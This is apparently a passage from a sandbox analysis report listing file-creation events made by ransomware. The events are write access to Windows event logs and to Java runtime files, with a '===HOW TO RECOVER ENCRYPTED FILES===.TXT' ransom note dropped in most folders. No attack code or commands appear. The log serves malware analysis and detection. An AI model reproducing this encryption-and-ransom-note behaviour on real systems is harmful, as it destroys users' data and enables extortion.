| Create | C:\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Known Folders API Service.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-LiveId%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-MUI%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-MUI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-NCSI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Ntfs%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Ntfs%4WHC.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SettingSync%4Debug.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SettingSync%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SMBClient%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SmbClient%4Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SMBServer%4Audit.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SMBServer%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-SMBServer%4Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Store%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-TWinUI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-Winlogon%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Setup.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\System.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Logs\Windows PowerShell.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\COPYRIGHT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\LICENSE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\README.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\release | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME-JAVAFX.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\Welcome.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\server\classes.jsa | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\server\classes.jsa | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\server\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\server\Xusage.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\accessibility.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\calendars.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\charsets.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\classlist | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\content-types.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\currency.data | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\flavormap.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fontconfig.bfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fontconfig.properties.src | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\hijrah-config-umalqura.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\javafx.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\javaws.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jce.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfr.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfxswt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jsse.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jvm.hprof.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\logging.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\management-agent.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\net.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\plugin.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\psfont.properties.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\psfontj2d.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\resources.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\rt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\sound.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\tzdb.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\tzmappings | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\amd64\jvm.cfg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\amd64\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\CIEXYZ.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\GRAY.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\LINEAR_RGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\PYCC.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\cmm\sRGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\ffjcext.zip | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_de.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_es.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_fr.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_it.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_ja.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_ko.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_pt_BR.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_sv.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_zh_CN.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_zh_HK.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_zh_TW.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash@2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash_11-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\splash_11@2x-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\access-bridge-64.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\cldrdata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\dnsns.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\jaccess.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\jfxrt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\localedata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\nashorn.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunec.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunjce_provider.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunmscapi.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunpkcs11.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\zipfs.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightDemiItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaBrightRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaTypewriterBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaTypewriterRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\cursors.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\invalid32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_CopyDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_CopyNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_LinkDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_LinkNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_MoveDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_MoveNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfr\default.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfr\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jfr\profile.jfc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
